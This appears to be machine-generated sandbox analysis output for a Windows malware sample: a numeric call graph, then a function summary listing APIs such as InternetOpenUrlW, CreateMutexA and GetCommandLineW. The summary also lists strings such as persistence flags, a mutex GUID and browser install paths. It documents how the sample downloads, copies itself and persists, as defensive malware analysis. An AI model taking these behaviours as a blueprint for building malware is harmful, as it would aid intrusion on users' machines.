38637 f23ea0 59 API calls 38636->38637 38638 f2ac1e 38636->38638 38637->38636 39096 f23ff0 59 API calls __expandlocale 38638->39096 38640 f2ac46 38641 f22900 60 API calls 38640->38641 38643 f2ac51 _memmove 38641->38643 38642 f1ef50 58 API calls 38644 f2acee 38642->38644 38643->38642 38644->38644 38645 f23ea0 59 API calls 38644->38645 38646 f2ad43 38644->38646 38645->38644 39097 f23ff0 59 API calls __expandlocale 38646->39097 38648 f2ad6b 38649 f22900 60 API calls 38648->38649 38651 f2ad76 _memmove 38649->38651 38650 f25c10 59 API calls 38652 f2ae2a 38650->38652 38651->38650 39098 f23580 59 API calls 38652->39098 38654 f2ae3c 38655 f25c10 59 API calls 38654->38655 38656 f2ae76 38655->38656 39099 f23580 59 API calls 38656->39099 38658 f2ae82 38659 f25c10 59 API calls 38658->38659 38660 f2aebc 38659->38660 39100 f23580 59 API calls 38660->39100 38662 f2aec8 38663 f25c10 59 API calls 38662->38663 38664 f2af02 38663->38664 39101 f23580 59 API calls 38664->39101 38666 f2af0e 38667 f25c10 59 API calls 38666->38667 38668 f2af48 38667->38668 39102 f23580 59 API calls 38668->39102 38670 f2af54 38671 f25c10 59 API calls 38670->38671 38672 f2af8e 38671->38672 39103 f23580 59 API calls 38672->39103 38674 f2af9a 38675 f25c10 59 API calls 38674->38675 38676 f2afd4 38675->38676 39104 f23580 59 API calls 38676->39104 38678 f2afe0 39105 f23100 59 API calls 38678->39105 38680 f2b001 39106 f23580 59 API calls 38680->39106 38682 f2b025 39107 f23100 59 API calls 38682->39107 38684 f2b03c 39108 f23580 59 API calls 38684->39108 38686 f2b059 39109 f23100 59 API calls 38686->39109 38688 f2b070 39110 f23580 59 API calls 38688->39110 38690 f2b07c 39111 f23100 59 API calls 38690->39111 38692 f2b093 39112 f23580 59 API calls 38692->39112 38694 f2b09f 39113 f23100 59 API calls 38694->39113 38696 f2b0b6 39114 f23580 59 API calls 38696->39114 38698 f2b0c2 39115 f23100 59 API calls 38698->39115 38700 f2b0d9 39116 f23580 59 API calls 38700->39116 38702 f2b0e5 39117 f23100 59 API calls 38702->39117 38704 f2b0fc 39118 f23580 59 API calls 38704->39118 38706 f2b108 38708 f2b130 38706->38708 39119 f2cdd0 59 API calls 38706->39119 38709 f1ef50 58 API calls 38708->38709 38710 f2b16e 38709->38710 38712 f2b1a5 GetUserNameW 38710->38712 39120 f22de0 59 API calls 38710->39120 38713 f2b1c9 38712->38713 39121 f22c40 38713->39121 38715 f2b1d8 39128 f22bf0 59 API calls 38715->39128 38717 f2b1ea 39129 f1ecb0 60 API calls 2 library calls 38717->39129 38719 f2b2f5 39132 f236c0 59 API calls 38719->39132 38721 f2b308 39133 f1ca70 59 API calls 38721->39133 38723 f2b311 39134 f230b0 59 API calls 38723->39134 38725 f22c40 59 API calls 38740 f2b1f3 38725->38740 38726 f2b322 39135 f1c740 102 API calls 4 library calls 38726->39135 38728 f22900 60 API calls 38728->38740 38729 f2b327 39136 f211c0 169 API calls 2 library calls 38729->39136 38732 f2b33b 39137 f2ba10 LoadCursorW RegisterClassExW 38732->39137 38734 f2b343 39138 f2ba80 CreateWindowExW ShowWindow UpdateWindow 38734->39138 38736 f23100 59 API calls 38736->38740 38737 f2b34b 38741 f2b34f 38737->38741 39139 f20a50 65 API calls 38737->39139 38740->38719 38740->38725 38740->38728 38740->38736 39130 f23580 59 API calls 38740->39130 39131 f1f1f0 59 API calls 38740->39131 38741->38613 38742 f2b379 39140 f23100 59 API calls 38742->39140 38744 f2b3a5 39141 f23580 59 API calls 38744->39141 38746 f2b48b 39147 f2fdc0 CreateThread 38746->39147 38748 f2b49f GetMessageW 38749 f2b4bf 38748->38749 38750 f2b4ed 38748->38750 38752 f2b4c5 TranslateMessage DispatchMessageW GetMessageW 38749->38752 38753 f2b502 PostThreadMessageW 38750->38753 38754 f2b55b 38750->38754 38752->38750 38752->38752 38755 f2b510 PeekMessageW 38753->38755 38756 f2b564 PostThreadMessageW 38754->38756 38757 f2b5bb 38754->38757 38758 f2b546 WaitForSingleObject 38755->38758 38759 f2b526 DispatchMessageW PeekMessageW 38755->38759 38760 f2b570 PeekMessageW 38756->38760 38757->38741 38761 f2b5d2 CloseHandle 38757->38761 38758->38754 38758->38755 38759->38758 38759->38759 38762 f2b5a6 WaitForSingleObject 38760->38762 38763 f2b586 DispatchMessageW PeekMessageW 38760->38763 38761->38741 38762->38757 38762->38760 38763->38762 38763->38763 38766 f2b3b3 38766->38746 39142 f2c330 59 API calls 38766->39142 39143 f2c240 59 API calls 38766->39143 39144 f2b8b0 59 API calls 38766->39144 39145 f23260 59 API calls 38766->39145 39146 f2fa10 CreateThread 38766->39146 39455 f37e0e 38769->39455 38771 f37f4c 38771->38436 38772->38409 38773->38413 38774->38420 38778->38439 38779->38445 38780->38447 38781->38451 38782->38452 38785 f38c9d 38783->38785 38786 f35179 38785->38786 38788 f38cbb 38785->38788 38792 f4b813 38785->38792 38786->38456 38789 f42553 TlsSetValue 38786->38789 38788->38785 38788->38786 38800 f429c9 Sleep 38788->38800 38789->38460 38790->38463 38791->38459 38793 f4b81e 38792->38793 38798 f4b839 38792->38798 38794 f4b82a 38793->38794 38793->38798 38801 f35208 58 API calls __getptd_noexit 38794->38801 38795 f4b849 HeapAlloc 38797 f4b82f 38795->38797 38795->38798 38797->38785 38798->38795 38798->38797 38802 f3793d DecodePointer 38798->38802 38800->38788 38801->38797 38802->38798 38804 f38b1b EnterCriticalSection 38803->38804 38805 f38b08 38803->38805 38804->38467 38813 f38b9f 58 API calls 10 library calls 38805->38813 38807 f38b0e 38807->38804 38814 f37c2e 58 API calls 3 library calls 38807->38814 38810->38480 38811->38478 38812->38469 38813->38807 38815->38487 38816->38492 38817->38497 38818->38494 38819->38494 38820->38506 38822 f4aeb8 EncodePointer 38821->38822 38822->38822 38823 f4aed2 38822->38823 38823->38509 38824->38512 38826 f1cf32 _memset __write_nolock 38825->38826 38827 f1cf4f InternetOpenW 38826->38827 38828 f25c10 59 API calls 38827->38828 38829 f1cf8a InternetOpenUrlW 38828->38829 38830 f1cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 38829->38830 38836 f1cfb2 38829->38836 39150 f256d0 38830->39150 38832 f1d000 38833 f256d0 59 API calls 38832->38833 38834 f1d049 38833->38834 38834->38836 39169 f23010 59 API calls 38834->39169 38836->38516 38837 f1d084 38837->38836 39170 f23010 59 API calls 38837->39170 39175 f2ccc0 38839->39175 39195 f2cc50 38842->39195 38845 f2a04d 38845->38528 38845->38533 38848 f23ab2 38847->38848 38849 f23ad0 GetModuleFileNameW PathRemoveFileSpecW 38847->38849 38850 f23b00 38848->38850 38851 f23aba 38848->38851 38857 f28400 38849->38857 39203 f5f23e 59 API calls 2 library calls 38850->39203 38852 f33b4c 59 API calls 38851->38852 38854 f23ac7 38852->38854 38854->38849 39204 f5f1bb 59 API calls 3 library calls 38854->39204 38858 f28437 38857->38858 38862 f28446 38857->38862 38858->38862 39205 f25d50 59 API calls __expandlocale 38858->39205 38859 f284b9 38859->38538 38862->38859 39206 f28d50 59 API calls 38862->39206 39207 f41781 38863->39207 39225 f3f7c0 38866->39225 38869 f21d20 _memset 38870 f21d40 RegQueryValueExW RegCloseKey 38869->38870 38871 f21d8f 38870->38871 38872 f25c10 59 API calls 38871->38872 38873 f21dbf 38872->38873 38874 f21dd1 lstrlenA 38873->38874 38875 f21e7c 38873->38875 39227 f23520 59 API calls 38874->39227 38876 f21e94 6 API calls 38875->38876 38879 f21ef5 UuidCreate UuidToStringW 38876->38879 38878 f21df1 38880 f21e08 38878->38880 38881 f21e3c PathFileExistsW 38878->38881 38882 f21f36 38879->38882 38880->38878 38880->38881 38881->38875 38883 f21e52 38881->38883 38882->38882 38885 f25c10 59 API calls 38882->38885 38884 f21e6a 38883->38884 38888 f24690 59 API calls 38883->38888 38887 f221d1 38884->38887 38886 f21f59 RpcStringFreeW PathAppendW CreateDirectoryW 38885->38886 38889 f21f98 38886->38889 38891 f21fce 38886->38891 38887->38569 38888->38884 38890 f25c10 59 API calls 38889->38890 38890->38891 38892 f25c10 59 API calls 38891->38892 38893 f2201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 38892->38893 38893->38887 38894 f2207c _memset 38893->38894 38895 f22095 6 API calls 38894->38895 38896 f22115 _memset 38895->38896 38897 f22109 38895->38897 38899 f22125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 38896->38899 39228 f23260 59 API calls 38897->39228 38900 f221b2 38899->38900 38901 f221aa GetLastError 38899->38901 38902 f221c0 WaitForSingleObject 38900->38902 38901->38887 38902->38887 38902->38902 38904 f3f7c0 __write_nolock 38903->38904 38905 f2222d 7 API calls 38904->38905 38906 f2228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 38905->38906 38907 f222bd K32EnumProcesses 38905->38907 38906->38907 38908 f222d3 38907->38908 38909 f222df 38907->38909 38908->38544 38910 f22353 38909->38910 38911 f222f0 OpenProcess 38909->38911 38910->38544 38912 f22346 CloseHandle 38911->38912 38913 f2230a K32EnumProcessModules 38911->38913 38912->38910 38912->38911 38913->38912 38914 f2231c K32GetModuleBaseNameW 38913->38914 39229 f30235 38914->39229 38916 f2233e 38916->38912 38917 f22345 38916->38917 38917->38912 38919 f30c62 _malloc 58 API calls 38918->38919 38922 f1ef6e _memset 38919->38922 38920 f1efdc 38920->38549 38921 f30c62 _malloc 58 API calls 38921->38922 38922->38920 38922->38921 38922->38922 38924 f23f05 38923->38924 38930 f23eae 38923->38930 38925 f23fb1 38924->38925 38926 f23f18 38924->38926 39245 f5f23e 59 API calls 2 library calls 38925->39245 38928 f23fbb 38926->38928 38929 f23f2d 38926->38929 38936 f23f3d __expandlocale 38926->38936 39246 f5f23e 59 API calls 2 library calls 38928->39246 38929->38936 39244 f26760 59 API calls 2 library calls 38929->39244 38930->38924 38935 f23ed4 38930->38935 38938 f23ed9 38935->38938 38939 f23eef 38935->38939 38936->38549 39242 f23da0 59 API calls __expandlocale 38938->39242 39243 f23da0 59 API calls __expandlocale 38939->39243 38942 f23ee9 38942->38549 38943 f23eff 38943->38549 38945 f246a9 38944->38945 38946 f2478c 38944->38946 38948 f246b6 38945->38948 38949 f246e9 38945->38949 39249 f5f26c 59 API calls 3 library calls 38946->39249 38950 f24796 38948->38950 38951 f246c2 38948->38951 38952 f247a0 38949->38952 38953 f246f5 38949->38953 39250 f5f26c 59 API calls 3 library calls 38950->39250 39247 f23340 59 API calls _memmove 38951->39247 39251 f5f23e 59 API calls 2 library calls 38952->39251 38965 f24707 __expandlocale 38953->38965 39248 f26950 59 API calls 2 library calls 38953->39248 38962 f246e0 38962->38567 38965->38567 38968 f1d27d CoInitializeSecurity 38967->38968 38974 f1d276 38967->38974 38969 f24690 59 API calls 38968->38969 38970 f1d2b8 CoCreateInstance 38969->38970 38971 f1d2e3 VariantInit VariantInit VariantInit VariantInit 38970->38971 38972 f1da3c CoUninitialize 38970->38972 38973 f1d38e VariantClear VariantClear VariantClear VariantClear 38971->38973 38972->38974 38975 f1d3e2 38973->38975 38976 f1d3cc CoUninitialize 38973->38976 38974->38589 39252 f1b140 38975->39252 38976->38974 38979 f1d3f6 39257 f1b1d0 38979->39257 38981 f1d422 38982 f1d426 CoUninitialize 38981->38982 38983 f1d43c 38981->38983 38982->38974 38984 f1b140 60 API calls 38983->38984 38986 f1d449 38984->38986 38987 f1b1d0 SysFreeString 38986->38987 38988 f1d471 38987->38988 38989 f1d496 CoUninitialize 38988->38989 38990 f1d4ac 38988->38990 38989->38974 38992 f1d8cf 38990->38992 38993 f1b140 60 API calls 38990->38993 38992->38972 38994 f1d4d5 38993->38994 38995 f1b1d0 SysFreeString 38994->38995 38996 f1d4fd 38995->38996 38996->38992 38997 f1b140 60 API calls 38996->38997 38998 f1d5ae 38997->38998 38999 f1b1d0 SysFreeString 38998->38999 39000 f1d5d6 38999->39000 39000->38992 39001 f1b140 60 API calls 39000->39001 39002 f1d679 39001->39002 39003 f1b1d0 SysFreeString 39002->39003 39004 f1d6a1 39003->39004 39004->38992 39005 f1b140 60 API calls 39004->39005 39006 f1d6b6 39005->39006 39007 f1b1d0 SysFreeString 39006->39007 39008 f1d6de 39007->39008 39008->38992 39009 f1b140 60 API calls 39008->39009 39010 f1d707 39009->39010 39011 f1b1d0 SysFreeString 39010->39011 39012 f1d72f 39011->39012 39012->38992 39013 f1b140 60 API calls 39012->39013 39014 f1d744 39013->39014 39015 f1b1d0 SysFreeString 39014->39015 39016 f1d76c 39015->39016 39016->38992 39261 f33aaf GetSystemTimeAsFileTime 39016->39261 39018 f1d77d 39263 f33551 39018->39263 39023 f22c40 59 API calls 39024 f1d7b5 39023->39024 39025 f22900 60 API calls 39024->39025 39026 f1d7c3 39025->39026 39027 f1b140 60 API calls 39026->39027 39028 f1d7db 39027->39028 39029 f1b1d0 SysFreeString 39028->39029 39030 f1d7ff 39029->39030 39030->38992 39031 f1b140 60 API calls 39030->39031 39032 f1d8a3 39031->39032 39033 f1b1d0 SysFreeString 39032->39033 39034 f1d8cb 39033->39034 39034->38992 39035 f1b140 60 API calls 39034->39035 39036 f1d8ea 39035->39036 39037 f1b1d0 SysFreeString 39036->39037 39038 f1d912 39037->39038 39038->38992 39271 f1b400 SysAllocString 39038->39271 39040 f1d936 VariantInit VariantInit 39041 f1b140 60 API calls 39040->39041 39042 f1d985 39041->39042 39043 f1b1d0 SysFreeString 39042->39043 39044 f1d9e7 VariantClear VariantClear VariantClear 39043->39044 39045 f1da10 39044->39045 39046 f1da46 CoUninitialize 39044->39046 39275 f3052a 78 API calls swprintf 39045->39275 39046->38974 39049->38522 39050->38565 39051->38566 39052->38605 39054 f30c6e 39053->39054 39055 f30cdd 39053->39055 39064 f30c79 39054->39064 39443 f3793d DecodePointer 39055->39443 39057 f30ce3 39444 f35208 58 API calls __getptd_noexit 39057->39444 39060 f30ca1 HeapAlloc 39063 f30cd5 39060->39063 39060->39064 39061 f30ce9 39061->38594 39063->39061 39064->39054 39064->39060 39065 f30cc9 39064->39065 39069 f30cc7 39064->39069 39435 f37f51 58 API calls 2 library calls 39064->39435 39436 f37fae 58 API calls 6 library calls 39064->39436 39437 f37b0b 39064->39437 39440 f3793d DecodePointer 39064->39440 39441 f35208 58 API calls __getptd_noexit 39065->39441 39442 f35208 58 API calls __getptd_noexit 39069->39442 39071->38606 39073 f25c66 39072->39073 39077 f25c1e 39072->39077 39074 f25c76 39073->39074 39075 f25cff 39073->39075 39079 f25c88 __expandlocale 39074->39079 39449 f26950 59 API calls 2 library calls 39074->39449 39450 f5f23e 59 API calls 2 library calls 39075->39450 39077->39073 39083 f25c45 39077->39083 39079->38611 39085 f24690 59 API calls 39083->39085 39086 f25c60 39085->39086 39086->38611 39087->38614 39088->38616 39089->38622 39090->38632 39092 f23a90 59 API calls 39091->39092 39093 f2294c MultiByteToWideChar 39092->39093 39094 f28400 59 API calls 39093->39094 39095 f2298d 39094->39095 39095->38634 39096->38640 39097->38648 39098->38654 39099->38658 39100->38662 39101->38666 39102->38670 39103->38674 39104->38678 39105->38680 39106->38682 39107->38684 39108->38686 39109->38688 39110->38690 39111->38692 39112->38694 39113->38696 39114->38698 39115->38700 39116->38702 39117->38704 39118->38706 39119->38708 39120->38710 39122 f22c71 39121->39122 39123 f22c5f 39121->39123 39126 f256d0 59 API calls 39122->39126 39124 f256d0 59 API calls 39123->39124 39125 f22c6a 39124->39125 39125->38715 39127 f22c8a 39126->39127 39127->38715 39128->38717 39129->38740 39130->38740 39131->38740 39132->38721 39133->38723 39134->38726 39135->38729 39136->38732 39137->38734 39138->38737 39139->38742 39140->38744 39141->38766 39142->38766 39143->38766 39144->38766 39145->38766 39146->38766 39451 f2f130 218 API calls ___get_qualified_locale 39146->39451 39147->38748 39452 f2fd80 64 API calls 39147->39452 39151 f25735 39150->39151 39152 f256de 39150->39152 39153 f2573e 39151->39153 39154 f257bc 39151->39154 39152->39151 39161 f25704 39152->39161 39159 f25750 __expandlocale 39153->39159 39173 f26760 59 API calls 2 library calls 39153->39173 39174 f5f23e 59 API calls 2 library calls 39154->39174 39159->38832 39163 f25709 39161->39163 39164 f2571f 39161->39164 39171 f23ff0 59 API calls __expandlocale 39163->39171 39172 f23ff0 59 API calls __expandlocale 39164->39172 39167 f25719 39167->38832 39168 f2572f 39168->38832 39169->38837 39170->38836 39171->39167 39172->39168 39173->39159 39181 f33b4c 39175->39181 39177 f2ccca 39180 f2a00a 39177->39180 39191 f5f1bb 59 API calls 3 library calls 39177->39191 39180->38525 39180->38526 39183 f33b54 39181->39183 39182 f30c62 _malloc 58 API calls 39182->39183 39183->39182 39184 f33b6e 39183->39184 39186 f33b72 std::exception::exception 39183->39186 39192 f3793d DecodePointer 39183->39192 39184->39177 39193 f40eca RaiseException 39186->39193 39188 f33b9c 39194 f40d91 58 API calls _free 39188->39194 39190 f33bae 39190->39177 39192->39183 39193->39188 39194->39190 39196 f33b4c 59 API calls 39195->39196 39197 f2cc5d 39196->39197 39200 f2cc64 39197->39200 39202 f5f1bb 59 API calls 3 library calls 39197->39202 39200->38845 39201 f2d740 59 API calls 39200->39201 39201->38845 39205->38862 39206->38862 39210 f41570 39207->39210 39213 f41580 39210->39213 39211 f41586 39221 f35208 58 API calls __getptd_noexit 39211->39221 39213->39211 39217 f415ae 39213->39217 39214 f4158b 39222 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 39214->39222 39220 f415cf wcstoxq 39217->39220 39223 f3e883 GetStringTypeW 39217->39223 39219 f2a36e lstrcpyW lstrcpyW 39219->38559 39220->39219 39224 f35208 58 API calls __getptd_noexit 39220->39224 39221->39214 39222->39219 39223->39217 39224->39219 39226 f21cf2 RegOpenKeyExW 39225->39226 39226->38869 39226->38887 39227->38878 39228->38896 39230 f30241 39229->39230 39231 f302b6 39229->39231 39238 f30266 39230->39238 39239 f35208 58 API calls __getptd_noexit 39230->39239 39241 f302c8 60 API calls 3 library calls 39231->39241 39234 f302c3 39234->38916 39235 f3024d 39240 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 39235->39240 39237 f30258 39237->38916 39238->38916 39239->39235 39240->39237 39241->39234 39242->38942 39243->38943 39244->38936 39247->38962 39248->38965 39249->38950 39250->38952 39253 f33b4c 59 API calls 39252->39253 39254 f1b164 39253->39254 39255 f1b177 SysAllocString 39254->39255 39256 f1b194 39254->39256 39255->39256 39256->38979 39258 f1b1de 39257->39258 39260 f1b202 39257->39260 39259 f1b1f5 SysFreeString 39258->39259 39258->39260 39259->39260 39260->38981 39262 f33add __aulldiv 39261->39262 39262->39018 39276 f4035d 39263->39276 39265 f3355a 39266 f1d78f 39265->39266 39284 f33576 39265->39284 39268 f328e0 39266->39268 39388 f3279f 39268->39388 39272 f1b423 39271->39272 39273 f1b41d 39271->39273 39274 f1b42d VariantClear 39272->39274 39273->39040 39274->39040 39275->38992 39317 f3501f 58 API calls 4 library calls 39276->39317 39278 f40363 39279 f4038d 39278->39279 39283 f40369 39278->39283 39319 f38cde 58 API calls 2 library calls 39278->39319 39279->39265 39282 f4036e 39282->39265 39283->39279 39318 f35208 58 API calls __getptd_noexit 39283->39318 39285 f33591 39284->39285 39286 f335a9 _memset 39284->39286 39328 f35208 58 API calls __getptd_noexit 39285->39328 39286->39285 39290 f335c0 39286->39290 39288 f33596 39329 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 39288->39329 39291 f335cb 39290->39291 39292 f335e9 39290->39292 39330 f35208 58 API calls __getptd_noexit 39291->39330 39320 f3fb64 39292->39320 39295 f335ee 39331 f3f803 58 API calls __mbsnbicoll_l 39295->39331 39297 f335f7 39298 f337e5 39297->39298 39332 f3f82d 58 API calls __mbsnbicoll_l 39297->39332 39345 f342fd 8 API calls 2 library calls 39298->39345 39301 f337ef 39302 f33609 39302->39298 39333 f3f857 39302->39333 39304 f3361b 39304->39298 39305 f33624 39304->39305 39306 f3369b 39305->39306 39308 f33637 39305->39308 39343 f3f939 58 API calls 4 library calls 39306->39343 39340 f3f939 58 API calls 4 library calls 39308->39340 39309 f336a2 39316 f335a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 39309->39316 39344 f3fbb4 58 API calls 4 library calls 39309->39344 39311 f3364f 39311->39316 39341 f3fbb4 58 API calls 4 library calls 39311->39341 39314 f33668 39314->39316 39342 f3f939 58 API calls 4 library calls 39314->39342 39316->39266 39317->39278 39318->39282 39319->39283 39321 f3fb70 __wsopen_helper 39320->39321 39322 f3fba5 __wsopen_helper 39321->39322 39323 f38af7 __lock 58 API calls 39321->39323 39322->39295 39324 f3fb80 39323->39324 39327 f3fb93 39324->39327 39346 f3fe47 39324->39346 39375 f3fbab LeaveCriticalSection _doexit 39327->39375 39328->39288 39329->39316 39330->39316 39331->39297 39332->39302 39334 f3f861 39333->39334 39335 f3f876 39333->39335 39386 f35208 58 API calls __getptd_noexit 39334->39386 39335->39304 39337 f3f866 39387 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 39337->39387 39339 f3f871 39339->39304 39340->39311 39341->39314 39342->39316 39343->39309 39344->39316 39345->39301 39347 f3fe53 __wsopen_helper 39346->39347 39348 f38af7 __lock 58 API calls 39347->39348 39349 f3fe71 _W_expandtime 39348->39349 39350 f3f857 __tzset_nolock 58 API calls 39349->39350 39351 f3fe86 39350->39351 39365 f3ff25 __tzset_nolock __isindst_nolock 39351->39365 39376 f3f803 58 API calls __mbsnbicoll_l 39351->39376 39354 f3fe98 39354->39365 39377 f3f82d 58 API calls __mbsnbicoll_l 39354->39377 39355 f3ff71 GetTimeZoneInformation 39355->39365 39358 f3feaa 39358->39365 39378 f43f99 58 API calls 2 library calls 39358->39378 39360 f3ffd8 WideCharToMultiByte 39360->39365 39361 f3feb8 39379 f51667 78 API calls 3 library calls 39361->39379 39363 f40010 WideCharToMultiByte 39363->39365 39365->39355 39365->39360 39365->39363 39367 f40157 __tzset_nolock __wsopen_helper __isindst_nolock 39365->39367 39368 f4ff8e 58 API calls __tzset_nolock 39365->39368 39374 f33c2d 61 API calls __tzset_nolock 39365->39374 39383 f342fd 8 API calls 2 library calls 39365->39383 39384 f30bed 58 API calls 2 library calls 39365->39384 39385 f400d7 LeaveCriticalSection _doexit 39365->39385 39366 f3ff0c _strlen 39381 f38cde 58 API calls 2 library calls 39366->39381 39367->39327 39368->39365 39370 f3fed9 type_info::operator== 39370->39365 39370->39366 39380 f30bed 58 API calls 2 library calls 39370->39380 39372 f3ff1a _strlen 39372->39365 39382 f3c0fd 58 API calls __mbsnbicoll_l 39372->39382 39374->39365 39375->39322 39376->39354 39377->39358 39378->39361 39379->39370 39380->39366 39381->39372 39382->39365 39383->39365 39384->39365 39385->39365 39386->39337 39387->39339 39415 f3019c 39388->39415 39391 f327d4 39423 f35208 58 API calls __getptd_noexit 39391->39423 39393 f327d9 39424 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 39393->39424 39394 f327e9 MultiByteToWideChar 39397 f32815 39394->39397 39398 f32804 GetLastError 39394->39398 39396 f1d7a3 39396->39023 39426 f38cde 58 API calls 2 library calls 39397->39426 39425 f351e7 58 API calls 3 library calls 39398->39425 39401 f3281d 39402 f32810 39401->39402 39403 f32825 MultiByteToWideChar 39401->39403 39430 f30bed 58 API calls 2 library calls 39402->39430 39403->39398 39404 f3283f 39403->39404 39427 f38cde 58 API calls 2 library calls 39404->39427 39406 f328a0 39431 f30bed 58 API calls 2 library calls 39406->39431 39409 f3284a 39409->39402 39428 f3d51e 88 API calls 3 library calls 39409->39428 39411 f32866 39411->39402 39412 f3286f WideCharToMultiByte 39411->39412 39412->39402 39413 f3288b GetLastError 39412->39413 39429 f351e7 58 API calls 3 library calls 39413->39429 39416 f301ad 39415->39416 39420 f301fa 39415->39420 39432 f35007 58 API calls 2 library calls 39416->39432 39418 f301b3 39419 f301da 39418->39419 39433 f345dc 58 API calls 6 library calls 39418->39433 39419->39420 39434 f3495e 58 API calls 6 library calls 39419->39434 39420->39391 39420->39394 39423->39393 39424->39396 39425->39402 39426->39401 39427->39409 39428->39411 39429->39402 39430->39406 39431->39396 39432->39418 39433->39419 39434->39420 39435->39064 39436->39064 39445 f37ad7 GetModuleHandleExW 39437->39445 39440->39064 39441->39069 39442->39063 39443->39057 39444->39061 39446 f37af0 GetProcAddress 39445->39446 39447 f37b07 ExitProcess 39445->39447 39446->39447 39448 f37b02 39446->39448 39448->39447 39449->39079 39456 f37e1a __wsopen_helper 39455->39456 39457 f38af7 __lock 51 API calls 39456->39457 39458 f37e21 39457->39458 39459 f37eda __cinit 39458->39459 39460 f37e4f DecodePointer 39458->39460 39475 f37f28 39459->39475 39460->39459 39462 f37e66 DecodePointer 39460->39462 39468 f37e76 39462->39468 39464 f37f37 __wsopen_helper 39464->38771 39466 f37e83 EncodePointer 39466->39468 39467 f37f1f 39469 f37b0b _malloc 3 API calls 39467->39469 39468->39459 39468->39466 39470 f37e93 DecodePointer EncodePointer 39468->39470 39471 f37f28 39469->39471 39473 f37ea5 DecodePointer DecodePointer 39470->39473 39472 f37f35 39471->39472 39480 f38c81 LeaveCriticalSection 39471->39480 39472->38771 39473->39468 39476 f37f2e 39475->39476 39478 f37f08 39475->39478 39481 f38c81 LeaveCriticalSection 39476->39481 39478->39464 39479 f38c81 LeaveCriticalSection 39478->39479 39479->39467 39480->39472 39481->39478

                                                                                                        Executed Functions

                                                                                                        Function 00F29F90 Relevance: 167.8, APIs: 65, Strings: 30, Instructions: 1565COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F1CF10: _memset.LIBCMT ref: 00F1CF4A
                                                                                                          • Part of subcall function 00F1CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F1CF5F
                                                                                                          • Part of subcall function 00F1CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F1CFA6
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00F29FC4
                                                                                                        • GetLastError.KERNEL32 ref: 00F29FD2
                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00F29FDA
                                                                                                        • GetLastError.KERNEL32 ref: 00F29FE4
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,00C23200,?), ref: 00F2A0BB
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F2A0C2
                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 00F2A161
                                                                                                          • Part of subcall function 00F224E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00F224FE
                                                                                                          • Part of subcall function 00F224E0: GetLastError.KERNEL32 ref: 00F22509
                                                                                                          • Part of subcall function 00F224E0: CloseHandle.KERNEL32 ref: 00F2251C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                        • API String ID: 2957410896-1224459563
                                                                                                        • Opcode ID: 4a965271d45640ad5782f821c5d0a379625dec3b018eb2539555d6d800b2a96a
                                                                                                        • Instruction ID: 1bc5a0f4a7b3354d894ba66b3736779f038ca3b572dd5e55f60bb7cd960c039c
                                                                                                        • Opcode Fuzzy Hash: 4a965271d45640ad5782f821c5d0a379625dec3b018eb2539555d6d800b2a96a
                                                                                                        • Instruction Fuzzy Hash: D9D2E2706043519BD724EF24EC56B9FB7E5BF84304F00092DF48597292EB79EA48EB92
                                                                                                        Uniqueness

